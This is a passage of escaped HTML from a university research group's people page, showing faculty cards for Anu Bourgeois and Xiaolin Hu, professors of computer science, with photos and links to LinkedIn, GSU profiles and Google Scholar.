<!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 